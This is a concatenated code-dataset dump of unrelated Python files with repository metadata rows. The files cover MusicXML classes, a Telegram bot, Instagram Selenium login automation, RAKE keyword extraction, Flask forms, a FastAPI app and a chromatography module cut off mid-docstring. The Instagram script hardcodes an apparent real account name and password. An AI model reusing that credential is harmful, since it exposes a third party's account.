from musicscore.musicxml.types.complextypes.slide import ComplexTypeSlide
from musicscore.musicxml.types.complextypes.slur import ComplexTypeSlur
from musicscore.musicxml.types.complextypes.technical import ComplexTypeTechnical
from musicscore.musicxml.types.complextypes.tied import ComplexTypeTied
from musicscore.musicxml.types.complextypes.tuplet import ComplexTypeTuplet
class Tied(ComplexTypeTied):
""""""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class Slur(ComplexTypeSlur):
_TAG = 'slur'
def __init__(self, type, *args, **kwargs):
super().__init__(tag=self._TAG, type=type, *args, **kwargs)
class Tuplet(ComplexTypeTuplet):
""""""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class Glissando(XMLElement):
""""""
def __init__(self, value, *args, **kwargs):
super().__init__(tag='glissando', value=value, *args, **kwargs)
raise NotImplementedError()
class Slide(ComplexTypeSlide):
""""""
_TAG = 'slide'
def __init__(self, type, *args, **kwargs):
super().__init__(tag=self._TAG, type=type, *args, **kwargs)
class Ornaments(ComplexTypeOrnaments):
""""""
_TAG = 'ornaments'
def __init__(self, *args, **kwargs):
super().__init__(tag=self._TAG, *args, **kwargs)
class Technical(ComplexTypeTechnical):
""""""
_TAG = 'technical'
def __init__(self, *args, **kwargs):
super().__init__(tag=self._TAG, *args, **kwargs)
class Articulations(ComplexTypeArticulations):
""""""
_TAG = 'articulations'
def __init__(self, *args, **kwargs):
super().__init__(tag=self._TAG, *args, **kwargs)
class Fermata(ComplexTypeFermata):
""""""
_TAG = 'fermata'
def __init__(self, value='normal', *args, **kwargs):
super().__init__(tag=self._TAG, value=value, *args, **kwargs)
class Arpeggiate(ComplexTypeArpeggiate):
""""""
_TAG = 'arpeggiate'
def __init__(self, *args, **kwargs):
super().__init__(tag=self._TAG, *args, **kwargs)
class NonArpeggiate(XMLElement):
""""""
def __init__(self, value, *args, **kwargs):
super().__init__(tag='non-arpeggiate', value=value, *args, **kwargs)
raise NotImplementedError()
class AccidentalMark(XMLElement):
""""""
def __init__(self, value, *args, **kwargs):
super().__init__(tag='accidental-mark', value=value, *args, **kwargs)
raise NotImplementedError()
class OtherNotation(XMLElement):
""""""
def __init__(self, value, *args, **kwargs):
super().__init__(tag='other-notation', value=value, *args, **kwargs)
raise NotImplementedError()
class ComplexTypeNotations(ComplexType, PrintObject, OptionalUniqueId):
"""
Notations refer to musical notations, not XML notations. Multiple notations are allowed in order to represent
multiple editorial levels. The print-object attribute, added in Version 3.0, allows notations to represent details
of performance technique, such as fingerings, without having them appear in the score.
"""
_DTD = Sequence(
GroupReference(Editorial),
Choice(
Element(Tied),
Element(Slur),
Element(Tuplet),
Element(Glissando),
Element(Slide),
Element(Ornaments),
Element(Technical),
Element(Articulations),
Element(Dynamics),
Element(Fermata),
Element(Arpeggiate),
Element(NonArpeggiate),
Element(AccidentalMark),
Element(OtherNotation),
min_occurrence=0,
max_occurrence=None
)
)
def __init__(self, *args, **kwargs):
super().__init__(tag='notations', *args, **kwargs)
| 30.715232 | 118 | 0.684994 | 3,403 | 0.733721 | 0 | 0 | 0 | 0 | 0 | 0 | 557 | 0.120095 |
904fd225f8fe0b9727c74b7b31cf0eb0c1430fbd | 794 | py | Python | src/constants.py | MitraSeifari/pystackoverflow | 70da1c6a8407df34496fe9843e8ae7f4c15aac0e | [
"MIT"
]
| null | null | null | src/constants.py | MitraSeifari/pystackoverflow | 70da1c6a8407df34496fe9843e8ae7f4c15aac0e | [
"MIT"
]
| null | null | null | src/constants.py | MitraSeifari/pystackoverflow | 70da1c6a8407df34496fe9843e8ae7f4c15aac0e | [
"MIT"
]
| null | null | null | from types import SimpleNamespace
from src.utils.keyboard import create_keyboard
keys = SimpleNamespace(
settings=':gear: Settings',
cancel=':cross_mark: Cancel',
back=':arrow_left: Back',
next=':arrow_right: Next',
add=':heavy_plus_sign: Add',
edit=':pencil: Edit',
save=':check_mark_button: Save',
delete=':wastebasket: Delete',
yes=':white_check_mark: Yes',
    no=':negative_squared_cross_mark: No',
ask_question=':red_question_mark: Ask a question',
send_question=':envelope_with_arrow: Send question',
)
keyboards = SimpleNamespace(
main=create_keyboard(keys.ask_question, keys.settings),
ask_question=create_keyboard(keys.cancel, keys.send_question),
)
states = SimpleNamespace(
main='MAIN',
ask_question='ASK_QUESTION'
)
| 26.466667 | 66 | 0.715365 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 314 | 0.395466 |
9051a1c1088095b37931ffbb5f87a6219186207b | 456 | py | Python | iirsBenchmark/exceptions.py | gAldeia/iirsBenchmark | 2211b4755405eb32178a09f1a01143d53dc6516d | [
"BSD-3-Clause"
]
| null | null | null | iirsBenchmark/exceptions.py | gAldeia/iirsBenchmark | 2211b4755405eb32178a09f1a01143d53dc6516d | [
"BSD-3-Clause"
]
| null | null | null | iirsBenchmark/exceptions.py | gAldeia/iirsBenchmark | 2211b4755405eb32178a09f1a01143d53dc6516d | [
"BSD-3-Clause"
]
| null | null | null | # Author: Guilherme Aldeia
# Contact: [email protected]
# Version: 1.0.0
# Last modified: 08-20-2021 by Guilherme Aldeia
"""
Simple exception that is raised by explainers when they don't support local
or global explanations, or when they are not model agnostic. This should be
caught and handled in the experiments.
"""
class NotApplicableException(Exception):
def __init__(self, message=""):
self.message = message | 32.571429 | 76 | 0.730263 | 109 | 0.239035 | 0 | 0 | 0 | 0 | 0 | 0 | 339 | 0.743421 |
90534359708ff8911197cad1bfec21d46c458905 | 1,302 | py | Python | covid_data_tracker/util.py | granularai/gh5050_covid_data_tracker | 7af3013ad9142a20cf42963e39c8968081cec7db | [
"MIT"
]
| null | null | null | covid_data_tracker/util.py | granularai/gh5050_covid_data_tracker | 7af3013ad9142a20cf42963e39c8968081cec7db | [
"MIT"
]
| 51 | 2020-05-31T17:36:37.000Z | 2020-06-24T05:23:19.000Z | covid_data_tracker/util.py | granularai/gh5050_covid_data_tracker | 7af3013ad9142a20cf42963e39c8968081cec7db | [
"MIT"
]
| 1 | 2020-06-11T19:35:41.000Z | 2020-06-11T19:35:41.000Z | import click
from covid_data_tracker.registry import PluginRegistry
def plugin_selector(selected_country: str):
"""plugin selector uses COUNTRY_MAP to find the appropriate plugin
for a given country.
Parameters
----------
selected_country : str
specify the country of interest.
Returns
-------
covid_data_tracker.plugins.BasePlugin
More appropriately, returns an instance of a country-specific
subclass of BasePlugin.
"""
if selected_country in PluginRegistry.keys():
klass = PluginRegistry[selected_country]
instance = klass()
else:
        click.echo('No country plugin available')
        raise AttributeError
return instance
def country_downloader(country: str):
"""Finds country plugin, fetches data, and downloads
to csv with click alerts.
Parameters
----------
country : str
Name of country
Returns
-------
NoneType
"""
click.echo(f"selecting plugin for {country}")
country_plugin = plugin_selector(country)
click.echo(f"attempting to find available data for {country}")
country_plugin.fetch()
click.echo(f"downloading available data for {country}")
country_plugin.check_instance_attributes()
country_plugin.download()
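# Illustrative sketch (not part of the original module): fetching and saving a
# single country's data end-to-end. "Kenya" is only an example name; the call
# works solely if a matching plugin is registered in PluginRegistry.
if __name__ == "__main__":
    country_downloader("Kenya")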
| 25.529412 | 70 | 0.675115 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 731 | 0.561444 |
90541de92a1d97d772f070e495cb4dccfca0eef7 | 1,416 | py | Python | dev/libs.py | karimwitani/webscraping | 58d4b2587d039fcea567db2caf86bbddb4e0b96f | [
"MIT"
]
| null | null | null | dev/libs.py | karimwitani/webscraping | 58d4b2587d039fcea567db2caf86bbddb4e0b96f | [
"MIT"
]
| null | null | null | dev/libs.py | karimwitani/webscraping | 58d4b2587d039fcea567db2caf86bbddb4e0b96f | [
"MIT"
]
| null | null | null | import selenium
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
def browser_init():
option = webdriver.ChromeOptions()
browser = webdriver.Chrome(executable_path='/Library/Application Support/Google/chromedriver', chrome_options=option)
return browser
def insta_login(browser):
browser.get('https://www.instagram.com')
#Find username/pass fields
username = WebDriverWait(browser,10).until(EC.element_to_be_clickable((By.XPATH, '//input[@name="username"]')))
password = WebDriverWait(browser,10).until(EC.element_to_be_clickable((By.XPATH, '//input[@name="password"]')))
#input username and pass
username.clear()
username.send_keys('itanikarim')
password.clear()
password.send_keys('1995PPrr')
#Login
Login_button = WebDriverWait(browser, 2).until(EC.element_to_be_clickable((By.XPATH, '//*[@id="loginForm"]/div/div[3]'))).click()
#Skip buttons
not_now = WebDriverWait(browser, 10).until(EC.element_to_be_clickable((By.XPATH, '//button[contains(text(), "Not Now")]'))).click()
not_now2 = WebDriverWait(browser, 10).until(EC.element_to_be_clickable((By.XPATH, '//button[contains(text(), "Not Now")]'))).click()
print("everything ok") | 40.457143 | 136 | 0.738701 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 348 | 0.245763 |
905515ca4421e0d997a1e7e93a11455f5f918cff | 380 | py | Python | setup.py | dwastberg/osmuf | 0cef4e87401b3fc2d344d7e067b4d9ada25848a4 | [
"MIT"
]
| null | null | null | setup.py | dwastberg/osmuf | 0cef4e87401b3fc2d344d7e067b4d9ada25848a4 | [
"MIT"
]
| null | null | null | setup.py | dwastberg/osmuf | 0cef4e87401b3fc2d344d7e067b4d9ada25848a4 | [
"MIT"
]
| null | null | null | from setuptools import setup
setup(name='osmuf',
version='0.1',
install_requires=[
"seaborn",
],
description='Urban Form analysis from OpenStreetMap',
url='http://github.com/atelierlibre/osmuf',
author='AtelierLibre',
author_email='[email protected]',
license='MIT',
packages=['osmuf'],
zip_safe=False)
| 25.333333 | 59 | 0.615789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 148 | 0.389474 |
905714b59b0d263f8c19b411a33bd80163e9bbb7 | 1,813 | py | Python | tests/test_model.py | artemudovyk/django-updown | 0353cf8ec5c50b4ffd869a56f51ede65b6368ef8 | [
"BSD-2-Clause"
]
| 41 | 2015-01-07T07:43:33.000Z | 2020-09-23T04:35:09.000Z | tests/test_model.py | artemudovyk/django-updown | 0353cf8ec5c50b4ffd869a56f51ede65b6368ef8 | [
"BSD-2-Clause"
]
| 20 | 2015-01-28T21:02:56.000Z | 2018-08-14T13:39:31.000Z | tests/test_model.py | artemudovyk/django-updown | 0353cf8ec5c50b4ffd869a56f51ede65b6368ef8 | [
"BSD-2-Clause"
]
| 19 | 2015-01-06T12:50:05.000Z | 2022-01-21T17:01:56.000Z | # -*- coding: utf-8 -*-
"""
tests.test_model
~~~~~~~~~~~~~~~~
Tests the models provided by the updown rating app
:copyright: 2016, weluse (https://weluse.de)
:author: 2016, Daniel Banck <[email protected]>
:license: BSD, see LICENSE for more details.
"""
from __future__ import unicode_literals
import random
from django.test import TestCase
from django.contrib.auth.models import User
from updown.models import SCORE_TYPES
from updown.exceptions import CannotChangeVote
from tests.models import RatingTestModel
class TestRatingModel(TestCase):
"""Test case for the generic rating app"""
def setUp(self):
self.instance = RatingTestModel.objects.create()
self.user = User.objects.create(
username=str(random.randint(0, 100000000))
)
self.user2 = User.objects.create(
username=str(random.randint(0, 100000000))
)
def test_basic_vote(self):
"""Test a simple vote"""
self.instance.rating.add(SCORE_TYPES['LIKE'], self.user,
'192.168.0.1')
self.assertEquals(self.instance.rating_likes, 1)
def test_change_vote(self):
self.instance.rating.add(SCORE_TYPES['LIKE'], self.user,
'192.168.0.1')
self.instance.rating.add(SCORE_TYPES['DISLIKE'], self.user,
'192.168.0.1')
self.assertEquals(self.instance.rating_likes, 0)
self.assertEquals(self.instance.rating_dislikes, 1)
def test_change_vote_disallowed(self):
self.instance.rating2.add(SCORE_TYPES['LIKE'], self.user,
'192.168.0.1')
self.assertRaises(CannotChangeVote, self.instance.rating2.add,
SCORE_TYPES['DISLIKE'], self.user, '192.168.0.1')
| 31.258621 | 75 | 0.629344 | 1,294 | 0.713734 | 0 | 0 | 0 | 0 | 0 | 0 | 421 | 0.232212 |
90571fc1423b9d2a5a71dbb91569f10170f5532e | 5,179 | py | Python | nlptk/ratings/rake/rake.py | GarryGaller/nlp_toolkit | df98ee25f8a1f4379e751fdd4fd9f5389ffbfd1b | [
"MIT"
]
| null | null | null | nlptk/ratings/rake/rake.py | GarryGaller/nlp_toolkit | df98ee25f8a1f4379e751fdd4fd9f5389ffbfd1b | [
"MIT"
]
| null | null | null | nlptk/ratings/rake/rake.py | GarryGaller/nlp_toolkit | df98ee25f8a1f4379e751fdd4fd9f5389ffbfd1b | [
"MIT"
]
| null | null | null | import sys,os
from typing import List
from collections import defaultdict, Counter
from itertools import groupby, chain, product
import heapq
from pprint import pprint
import string
class Rake():
def __init__(
self,
text:List[List[str]],
stopwords=[],
max_words=100,
min_chars=3
):
self.text = text
self.stopwords = stopwords
self.blacklist = set(chain(stopwords, string.punctuation))
self._phrases = set()
        # The frequency freq(w) of a word is the number of candidate phrases
        # in which the word occurs
self.freq = Counter()
        # The degree deg(w) of a word is the total number of words making up
        # the phrases that contain it.
self.degree = Counter()
        # The word weight is defined as the ratio of its degree to its frequency:
        # s(w) = deg(w)/freq(w)
self.token_weights = Counter()
self.phrase_scores = Counter()
self.min_chars = min_chars
self.max_words = max_words
self._generate_phrases()
self._calc_frequencies()
self._calc_weights()
self._calc_scores()
def _generate_phrases(self):
'''Create contender phrases from sentences.'''
for sent in self.text:
self._phrases.update(self._get_phrase_list(sent))
def _get_phrase_list(self,sent):
        '''Group the remaining (non-blacklisted) words into candidate phrases'''
groups = groupby(sent, lambda x: x not in self.blacklist)
phrases = [tuple(group[1]) for group in groups if group[0]]
result = []
for phrase in phrases:
if (
phrase
and len(' '.join(phrase)) >= self.min_chars
and len(phrase) <= self.max_words
):
result.append(phrase)
#print('_get_phrase_list')
#pprint(result)
return result
def _calc_frequencies(self):
'''Calculation of frequencies of words'''
for phrase in self._phrases:
for token in phrase:
self.freq[token] += 1
                self.degree[token] += len(phrase) - 1 # the 1 is not subtracted in every implementation; intent unclear
        # not every RAKE example adds the frequency to the degree as done below; intent unclear
for token in self.freq:
self.degree[token] += self.freq[token]
def _calc_frequencies2(self):
self.freq = Counter(chain.from_iterable(self._phrases))
def build_occurance_graph():
graph = defaultdict(lambda: defaultdict(int))
for phrase in self._phrases:
                # For each phrase in the phrase list, count co-occurrences of the
# word with other words in the phrase.
#
                # Note: Keep the co-occurrences graph as is, to help facilitate its
# use in other creative ways if required later.
for (word, coword) in product(phrase, phrase):
graph[word][coword] += 1
return graph
graph = build_occurance_graph()
self.degree = defaultdict(int)
for token in graph:
self.degree[token] = sum(graph[token].values())
pprint(graph )
def _calc_weights(self):
        # word weights: s(w) = deg(w)/freq(w)
for token in self.freq:
score = self.degree[token] / (self.freq[token] * 1.0)
self.token_weights[token] += score
def _calc_scores(self):
for phrase in self._phrases:
#print(phrase,self._phrases.count(phrase))
score = sum(self.token_weights.get(token,0) for token in phrase)
self.phrase_scores[' '.join(phrase)] += score
def topn(self,n=7,phrase=True):
'''Get top phrases with ratings'''
if phrase:
scores = self.phrase_scores
else:
scores = self.token_weights
if n < 0:
n = len(scores)
return heapq.nlargest(n,
scores,
key=scores.get
)
def phrases(self,scores=True):
if scores:
result = sorted(
self.phrase_scores.items(),
key=lambda t:t[1],
reverse=True
)
else:
result = sorted(
self.phrase_scores,
key=self.phrase_scores.get,
reverse=True
)
return result
def get_token_weights(self,scores=True):
if scores:
result = sorted(
self.token_weights.items(),
key=lambda t:t[1],
reverse=True
)
else:
result = sorted(
self.token_weights,
key=self.token_weights.get,
reverse=True
)
return result
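# Illustrative usage sketch (not part of the original module). The sentences
# are pre-tokenised lists of lowercase tokens, as the class expects, and the
# stopword list is a tiny made-up one.
if __name__ == '__main__':
    sample_text = [
        ['compatibility', 'of', 'systems', 'of', 'linear', 'constraints'],
        ['criteria', 'of', 'compatibility', 'of', 'a', 'system', 'of',
         'linear', 'diophantine', 'equations'],
    ]
    rake = Rake(sample_text, stopwords=['of', 'a', 'the'])
    pprint(rake.topn(3))    # best-scoring phrases
    pprint(rake.phrases())  # every phrase with its score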
| 30.827381 | 85 | 0.519598 | 5,255 | 0.96087 | 0 | 0 | 0 | 0 | 0 | 0 | 1,196 | 0.218687 |
90572919b03e5c9195f95e3b9733b72ece7106bb | 5,623 | py | Python | depimpact/tests/test_functions.py | NazBen/dep-impact | 284e72bccfb6309110df5191dfae3c0a93ce813b | [
"MIT"
]
| null | null | null | depimpact/tests/test_functions.py | NazBen/dep-impact | 284e72bccfb6309110df5191dfae3c0a93ce813b | [
"MIT"
]
| null | null | null | depimpact/tests/test_functions.py | NazBen/dep-impact | 284e72bccfb6309110df5191dfae3c0a93ce813b | [
"MIT"
]
| null | null | null | import numpy as np
import openturns as ot
def func_overflow(X, model=1, h_power=0.6):
"""Overflow model function.
Parameters
----------
X : np.ndarray, shape : N x 8
Input variables
- x1 : Flow,
        - x2 : Strickler coefficient,
- x3 : Zv, etc...
model : bool, optional(default=1)
If 1, the classical model. If 2, the economic model.
Returns
-------
Overflow S (if model=1) or Cost Cp (if model=2).
"""
X = np.asarray(X)
if X.shape[0] == X.size: # It's a vector
n = 1
dim = X.size
ids = None
else:
n, dim = X.shape
ids = range(n)
    assert dim == 8, "Incorrect dimension: dim = %d != 8" % dim
Q = X[ids, 0]
Ks = X[ids, 1]
Zv = X[ids, 2]
Zm = X[ids, 3]
Hd = X[ids, 4]
Cb = X[ids, 5]
L = X[ids, 6]
B = X[ids, 7]
H = (Q / (B * Ks * np.sqrt((Zm - Zv) / L)))**h_power
S = Zv + H - Hd - Cb
if model == 1:
return S
elif model == 2:
Cp = (S > 0.) + (0.2 + 0.8 * (1. - np.exp(-1000. / (S**4)))) * (S <= 0.) + 1./20. * (Hd * (Hd > 8.) + 8*(Hd <= 8.))
return Cp
else:
        raise AttributeError('Unknown model.')
tmp = ot.Gumbel()
tmp.setParameter(ot.GumbelMuSigma()([1013., 558.]))
dist_Q = ot.TruncatedDistribution(tmp, 500., 3000.)
dist_Ks = ot.TruncatedNormal(30., 8., 15., np.inf)
dist_Zv = ot.Triangular(49., 50., 51.)
dist_Zm = ot.Triangular(54., 55., 56.)
dist_Hd = ot.Uniform(7., 9.)
dist_Cb = ot.Triangular(55., 55.5, 56.)
dist_L = ot.Triangular(4990., 5000., 5010.)
dist_B = ot.Triangular(295., 300., 305.)
margins_overflow = [dist_Q, dist_Ks, dist_Zv, dist_Zm, dist_Hd, dist_Cb, dist_L, dist_B]
var_names_overflow = ["Q", "K_s", "Z_v", "Z_m", "H_d", "C_b", "L", "B"]
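# Illustrative helper (not part of the original module): sample the margins
# defined above, treating the eight components as independent, and evaluate
# both overflow models on the sample.
def demo_overflow_sample(n_samples=1000):
    sample = np.asarray(ot.ComposedDistribution(margins_overflow).getSample(n_samples))
    return func_overflow(sample, model=1), func_overflow(sample, model=2)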
def func_sum(x, a=None):
"""Additive weighted model function.
Parameters
----------
x : np.ndarray
The input values.
a : np.ndarray
The input coefficients.
Returns
-------
y : a.x^t
"""
if isinstance(x, list):
x = np.asarray(x)
n, dim = x.shape
if a is None:
a = np.ones((dim, 1))
if a.ndim == 1:
a = a.reshape(-1, 1)
assert a.shape[0] == dim, "Shape not good"
elif a.ndim > 2:
raise AttributeError('Dimension problem for constant a')
y = np.dot(x, a)
if y.size == 1:
return y.item()
elif y.size == y.shape[0]:
return y.ravel()
else:
return y
def func_prod(x, a=None):
"""Product weighted model function.
Parameters
----------
x : np.ndarray
The input values.
a : np.ndarray
The input coefficients.
Returns
-------
    y : prod(x)
"""
if isinstance(x, list):
x = np.asarray(x)
n, dim = x.shape
if a is None:
a = np.ones((dim, 1))
if a.ndim == 1:
a = a.reshape(-1, 1)
assert a.shape[0] == dim, "Shape not good"
elif a.ndim > 2:
raise AttributeError('Dimension problem for constant a')
    y = np.prod(x, axis=1)
if y.size == 1:
return y.item()
elif y.size == y.shape[0]:
return y.ravel()
else:
return y
def func_spec(x, a=[0.58, -1, -1.0, 0, 0., 0.]):
"""Product weighted model function.
Parameters
----------
x : np.ndarray
The input values.
a : np.ndarray
The input coefficients.
Returns
-------
y : a.x^t
"""
if isinstance(x, list):
x = np.asarray(x)
n, dim = x.shape
y = a[0]*(x**2).prod(axis=1) + \
a[1]*x.prod(axis=1) + \
a[2]*(x**2).sum(axis=1) + \
a[3] * x.sum(axis=1) + \
a[4] * np.sin(x).sum(axis=1) + \
a[5] * np.cos(x).sum(axis=1)
if y.size == 1:
return y.item()
elif y.size == y.shape[0]:
return y.ravel()
else:
return y
def func_cum_sum_weight(x, weights=None, use_sum=True, const=[0., 0., 0., 1., 0., 0.]):
"""Additive weighted model function.
Parameters
----------
x : np.ndarray
The input values.
weights : np.ndarray
The input coefficients.
Returns
-------
y : a.x^t
"""
if isinstance(x, list):
x = np.asarray(x)
n, dim = x.shape
if weights is None:
weights = np.zeros((dim, dim))
corr_dim = dim * (dim-1)/2
k = 1
for i in range(1, dim):
for j in range(i):
weights[i, j] = k
k += 1
weights /= corr_dim
if weights.ndim == 1:
weights = weights.reshape(-1, 1)
assert weights.shape[0] == dim, "Shape not good"
elif weights.ndim > 2:
raise AttributeError('Dimension problem for constant a')
if use_sum:
y = 1
for i in range(1, dim):
for j in range(i):
y *= (1. + weights[i, j] * func_spec(np.c_[x[:, i], x[:, j]], a=const))
else:
y = 0
for i in range(1, dim):
for j in range(i):
y += weights[i, j] * func_spec(np.c_[x[:, i], x[:, j]], a=const)
return y
def multi_output_func_sum(x, output_dim=2):
"""Additive model function with multi output.
Parameters
----------
x : np.ndarray
The input values.
output_dim : int
The number of output dimension.
Returns
-------
    y : [i * sum(x) for i in range(output_dim)]
"""
return np.asarray([x.sum(axis=1)*a for a in range(output_dim)]).T | 24.554585 | 123 | 0.486395 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,793 | 0.318756 |
9059540a6a1df436a316a8b4d0bf19c43271fcb4 | 1,699 | py | Python | app/main/forms.py | ingabire1/blog | 5fcee6027cee9fbdcd94057123862bd146a16e98 | [
"Unlicense"
]
| null | null | null | app/main/forms.py | ingabire1/blog | 5fcee6027cee9fbdcd94057123862bd146a16e98 | [
"Unlicense"
]
| null | null | null | app/main/forms.py | ingabire1/blog | 5fcee6027cee9fbdcd94057123862bd146a16e98 | [
"Unlicense"
]
| null | null | null |
from flask_wtf import FlaskForm
from wtforms import StringField,TextAreaField,SubmitField
from wtforms.validators import Required
class ReviewForm(FlaskForm):
title = StringField('Review title',validators=[Required()])
review = TextAreaField('Movie review', validators=[Required()])
submit = SubmitField('Submit')
class UpdateProfile(FlaskForm):
bio = TextAreaField('Tell us about you.',validators = [Required()])
submit = SubmitField('Submit')
# class LoginForm(FlaskForm):
# email = StringField('Your Email Address',validators=[Required(),Email()])
# password = PasswordField('Password',validators =[Required()])
# remember = BooleanField('Remember me')
# submit = SubmitField('Sign In')
class BlogForm(FlaskForm):
# my_category = StringField('Category', validators=[Required()])
title = StringField('Title', validators=[Required()])
blog_post = TextAreaField('Type Blog here', validators=[Required()])
post = SubmitField('Post Blog')
class CommentForm(FlaskForm):
name = StringField('Name',validators=[Required()])
# email = StringField('Email', validators=[Required()],render_kw={"placeholder": "Email"})
comment = TextAreaField('Enter Comment', validators=[Required()])
post = SubmitField('Post Comment')
class SubscriptionForm(FlaskForm):
name = StringField('First Name', validators=[Required()])
subscription_data = StringField('Email', validators=[Required()])
subscribe = SubmitField('Subscribe')
class UpdatePostForm(FlaskForm):
# title = StringField('Title', validators=[Required()])
blog_post = TextAreaField('Type Blog here', validators=[Required()])
submit=SubmitField('SUBMIT')
| 42.475 | 94 | 0.712772 | 1,294 | 0.761624 | 0 | 0 | 0 | 0 | 0 | 0 | 652 | 0.383755 |
9059c31682941520b3a9802d364d8232668dc8f3 | 3,228 | py | Python | SEPHIRA/FastAPI/main.py | dman926/Flask-API | 49e052159a3915ec25305141ecdd6cdeb1d7a25c | [
"MIT"
]
| 4 | 2021-04-23T16:51:57.000Z | 2021-06-06T20:28:08.000Z | SEPHIRA/FastAPI/main.py | dman926/Flask-API | 49e052159a3915ec25305141ecdd6cdeb1d7a25c | [
"MIT"
]
| 15 | 2021-10-22T01:55:53.000Z | 2022-01-15T11:40:48.000Z | SEPHIRA/FastAPI/main.py | dman926/Flask-API | 49e052159a3915ec25305141ecdd6cdeb1d7a25c | [
"MIT"
]
| 3 | 2021-03-21T22:29:05.000Z | 2021-06-06T20:30:18.000Z | from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from starlette import status
from starlette.middleware.base import BaseHTTPMiddleware, RequestResponseEndpoint
from starlette.requests import Request
from starlette.responses import Response
from starlette.types import ASGIApp
from config import APISettings, CORSSettings, FastAPISettings, PayPalSettings, UvicornSettings, ShopSettings, NowPaymentsSettings
import logging
####
# Custom Middlewares #
####
class LimitPostContentSizeMiddleware(BaseHTTPMiddleware):
def __init__(self, app: ASGIApp, max_upload_size: int) -> None:
super().__init__(app)
self.max_upload_size = max_upload_size
async def dispatch(self, request: Request, call_next: RequestResponseEndpoint) -> Response:
if request.method == 'POST':
if 'content-length' not in request.headers:
return Response(status_code=status.HTTP_411_LENGTH_REQUIRED)
			content_length = int(request.headers['content-length'])
if content_length > self.max_upload_size:
return Response(status_code=status.HTTP_413_REQUEST_ENTITY_TOO_LARGE)
return await call_next(request)
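# Behaviour note: the middleware above rejects POST requests that lack a
# Content-Length header with 411 and POST requests whose declared
# Content-Length exceeds `max_upload_size` with 413, before the body is
# processed. It relies on the declared header value rather than counting the
# streamed body bytes.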
####
# #
####
logging.basicConfig(filename="log.log", level=logging.INFO, format=f'%(asctime)s %(levelname)s %(name)s %(threadName)s : %(message)s')
logger = logging.getLogger(__name__)
app = FastAPI(debug=FastAPISettings.DEBUG)
app.add_middleware(
CORSMiddleware,
allow_origins=CORSSettings.ALLOW_ORIGINS,
allow_methods=['*'],
allow_headers=['*']
)
if UvicornSettings.MAX_CONTENT_SIZE:
app.add_middleware(
LimitPostContentSizeMiddleware,
max_upload_size=UvicornSettings.MAX_CONTENT_SIZE
)
@app.on_event('startup')
async def startup():
logger.info('-- STARTING UP --')
print('-- STARTING UP --')
from database.db import initialize_db
initialize_db()
from resources.routes import initialize_routes
initialize_routes(app)
if ShopSettings.ENABLE:
if NowPaymentsSettings.ENABLE:
from resources.nowpayments import getNowPaymentsStatus, setCachedAvailableCoins
if await getNowPaymentsStatus():
print('NOWPayments is online. Fetching available coins...')
for i in range(NowPaymentsSettings.STARTUP_COIN_FETCH_AMOUNT):
if await setCachedAvailableCoins():
print('NOWPayments coins cached.')
break
else:
print('Failed to get NOWPayments coins.')
if i < NowPaymentsSettings.STARTUP_COIN_FETCH_AMOUNT - 1:
print(f'Retrying {NowPaymentsSettings.STARTUP_COIN_FETCH_AMOUNT - 1 - i} time(s).')
else:
print('NOWPayments not responding.')
				print(f'Available coins will be set on the next request to {APISettings.ROUTE_BASE}payment/nowpayments/available-coins if NOWPayments is available.')
print('-- STARTED UP --')
logger.info('-- STARTED UP --')
@app.on_event('shutdown')
async def shutdown():
logger.info('-- SHUTTING DOWN --')
print('-- SHUTTING DOWN --')
from database.db import close_db
close_db()
import os
import shutil
if os.path.exists('cache'):
shutil.rmtree('cache')
print('-- SHUT DOWN --')
logger.info('-- SHUT DOWN --')
if __name__ == '__main__':
import uvicorn
uvicorn.run('main:app', reload=UvicornSettings.USE_RELOADER, log_level=UvicornSettings.LOG_LEVEL, port=UvicornSettings.PORT) | 32.606061 | 160 | 0.763011 | 636 | 0.197026 | 0 | 0 | 1,426 | 0.44176 | 1,821 | 0.564126 | 731 | 0.226456 |
905b8e431341e337a25074cf4f7919a71c8959b2 | 94,831 | py | Python | bio_rtd/uo/sc_uo.py | open-biotech/bio-rtd | c3e2cf4d7d646bda719e5fc6f694a1cae0e412c0 | [
"MIT"
]
| 5 | 2020-03-30T13:26:12.000Z | 2021-04-02T07:10:49.000Z | bio_rtd/uo/sc_uo.py | open-biotech/bio-rtd | c3e2cf4d7d646bda719e5fc6f694a1cae0e412c0 | [
"MIT"
]
| null | null | null | bio_rtd/uo/sc_uo.py | open-biotech/bio-rtd | c3e2cf4d7d646bda719e5fc6f694a1cae0e412c0 | [
"MIT"
]
| 1 | 2020-06-03T07:50:56.000Z | 2020-06-03T07:50:56.000Z | """Semi continuous unit operations.
Unit operations that accept constant or box-shaped flow rate profile
and provide periodic flow rate profile.
"""
__all__ = ['AlternatingChromatography', 'ACC', 'PCC', 'PCCWithWashDesorption']
__version__ = '0.7.1'
__author__ = 'Jure Sencar'
import typing as _typing
import numpy as _np
import scipy.interpolate as _interp
from bio_rtd.chromatography import bt_load as _bt_load
import bio_rtd.utils as _utils
import bio_rtd.core as _core
import bio_rtd.pdf as _pdf
class AlternatingChromatography(_core.UnitOperation):
"""Simulation of alternating chromatography.
This class implements logic common to various types of alternating
chromatography. It has a role of a base class for
specific types of alternating chromatography to extend.
Parameters
----------
t
Simulation time vector.
Starts with 0 and has a constant time step.
uo_id
Unique identifier.
load_bt
Load breakthrough logic.
peak_shape_pdf
Elution peak shape.
gui_title
Readable title for GUI. Default = "AC".
Notes
-----
**Quick description of which attributes are available:**
Non-binding species (optional):
* :attr:`non_binding_species`
Column volume (exactly one required):
* :attr:`cv`
* :attr:`ft_mean_retentate` and :attr:`column_porosity_retentate`
Column porosity for binding species (required in case of
:attr:`ft_mean_retentate` or wash or load recycling):
* :attr:`column_porosity_retentate`
Equilibration step duration (optional, if both, the values are
added together):
* :attr:`equilibration_cv`
* :attr:`equilibration_t`
Equilibration step flow rate (exactly one needed):
* :attr:`equilibration_f` - absolute, has priority if defined
* :attr:`equilibration_f_rel` - relative, default = 1
Load step duration:
* :attr:`load_cv` - preferred
* :attr:`load_c_end_ss` - concentration limit for breakthrough; also
